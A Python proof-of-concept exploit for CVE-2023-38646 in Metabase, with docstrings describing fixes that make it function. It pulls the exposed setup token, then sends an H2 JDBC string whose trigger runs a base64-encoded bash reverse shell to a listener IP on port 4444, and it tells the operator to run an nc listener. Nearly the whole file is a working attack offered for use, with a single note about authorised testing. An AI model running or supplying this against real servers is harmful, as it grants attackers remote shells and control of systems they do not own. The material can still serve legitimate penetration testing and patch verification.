import sys
import json
import base64
import requests
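def print_usage():
    """Print the command-line synopsis to stdout.

    The original hard-coded ``metabase_poc.py`` as the script name, which does
    not match this file; ``sys.argv[0]`` prints whatever the user actually ran.
    The listener port is fixed at 4444 by ``exploit_metabase``'s default, hence
    the ``nc`` hint.
    """
    print(f"Usage: python {sys.argv[0]} http://127.0.0.1:3000 listener_ip")
    print("Install listener before use: nc -lvnp 4444")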
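def _build_shell_command(payload_encoded):
    """Return the ``bash -c`` one-liner that decodes and runs the base64 payload.

    The brace-expansion form (``{echo,...}``) keeps the command free of spaces,
    as in the original.  The braces must be doubled inside an f-string; the
    original left them single, so Python tried to evaluate ``echo,'$payload$'``
    as an expression and the script died with ``NameError`` before sending
    anything.
    """
    return f"bash -c {{echo,{payload_encoded}}}|{{base64,-d}}|{{bash,-i}}"


def _build_jdbc_url(shell_command):
    """Return the H2 JDBC connection string carrying the trigger.

    ``\\\\;`` and ``\\n`` are sent as literal backslash sequences (two chars
    each), exactly as the original encoded them; the trigger body is JavaScript
    that calls ``Runtime.exec`` with *shell_command*.  The original quoted the
    placeholder as ``'$payload$'`` inside the already single-quoted ``exec``
    argument, which would have broken the JavaScript string; the command is
    inserted bare here.
    """
    trigger_body = (
        "//javascript\\n"
        f"java.lang.Runtime.getRuntime().exec('{shell_command}')\\n"
    )
    return (
        "zip:/app/metabase.jar!/sample-database.db;"
        "MODE=MSSQLServer;"
        "TRACE_LEVEL_SYSTEM_OUT=1\\\\;"
        "CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES "
        f"AS $${trigger_body}$$--=x"
    )


def _build_validate_body(setup_token, payload_encoded):
    """Return the JSON body for ``POST /api/setup/validate``.

    ``token`` is the setup token as-is.  The original appended the base64
    payload to it (leaving ``$payload$`` unreplaced in the JDBC string); an
    equality check against the real token can never accept such a value.
    """
    return {
        "token": setup_token,
        "details": {
            "is_on_demand": False,
            "is_full_sync": False,
            "is_sample": False,
            "cache_ttl": None,
            "refingerprint": False,
            "auto_run_queries": True,
            "schedules": {},
            "details": {
                "db": _build_jdbc_url(_build_shell_command(payload_encoded)),
                "advanced-options": False,
                "ssl": True,
            },
            "name": "test",
            "engine": "h2",
        },
    }


def exploit_metabase(api_url, listener_ip, *, listener_port=4444, timeout=15):
    """Check a Metabase instance for CVE-2023-38646 and send the reverse-shell payload.

    Reads the unauthenticated ``/api/session/properties`` for ``setup-token``
    and ``version.tag``, then POSTs an H2 JDBC connection string containing a
    ``CREATE TRIGGER`` whose JavaScript body runs ``bash -i`` back to
    ``listener_ip:listener_port``.  Only use against systems you are
    authorised to test.

    Args:
        api_url: Base URL of the target, e.g. ``http://127.0.0.1:3000``
            (no trailing slash).
        listener_ip: Address the reverse shell connects back to.
        listener_port: Listener port; default 4444 matches ``print_usage``.
        timeout: Per-request timeout in seconds.  The original had none, so a
            silent target hung the script forever.

    Returns:
        The ``requests.Response`` of the validate call, or ``None`` when the
        target exposes no ``setup-token`` -- nothing is sent in that case.

    Raises:
        requests.exceptions.RequestException: connection or timeout failure.
        ValueError: if ``/api/session/properties`` is not a JSON object.
    """
    payload = f"bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1"
    payload_encoded = base64.b64encode(payload.encode()).decode()

    # verify=False lets self-signed lab targets work; it also means the
    # request can be intercepted.  Acceptable for a PoC, not for anything else.
    properties_url = f"{api_url}/api/session/properties"
    response = requests.get(properties_url, verify=False, timeout=timeout)
    properties = response.json()
    if not isinstance(properties, dict):
        raise ValueError(f"unexpected response from {properties_url}: not a JSON object")

    setup_token = properties.get("setup-token")
    # "version" may be missing or null; the original's chained .get() raised on null.
    metabase_version = (properties.get("version") or {}).get("tag")

    print(f"Payload = {payload}")
    print(f"Setup_token = {setup_token}")
    print(f"Version = {metabase_version}")

    if not setup_token:
        # Without the leaked token the validate call cannot succeed; the
        # original would have sent the literal string "None" as the token.
        print("[-] No setup-token exposed by the target; nothing sent.")
        return None

    print("\n\t [*] TRY EXPLOIT [*]")
    exploit_body = _build_validate_body(setup_token, payload_encoded)
    # requests sets Content-Type: application/json for json=; the original's
    # unused `headers` dict is dropped.
    return requests.post(
        f"{api_url}/api/setup/validate",
        json=exploit_body,
        verify=False,
        timeout=timeout,
    )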
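def main():
    """CLI entry point: ``<script> <base_url> <listener_ip>``.

    Exits with status 1 on bad usage and 2 when no request was sent.  Prints
    the HTTP status and the start of the response body so the operator can
    tell a rejected request from an accepted one; the original discarded the
    response entirely.
    """
    if len(sys.argv) < 3:
        print_usage()
        sys.exit(1)
    # Tolerate a trailing slash so the endpoint paths do not become "//api/...".
    api_url = sys.argv[1].rstrip("/")
    listener_ip = sys.argv[2]
    response = exploit_metabase(api_url, listener_ip)
    if response is None:
        # Defensive: treat a missing response as "nothing was sent".
        sys.exit(2)
    print(f"HTTP {response.status_code}")
    print(response.text[:500])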
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()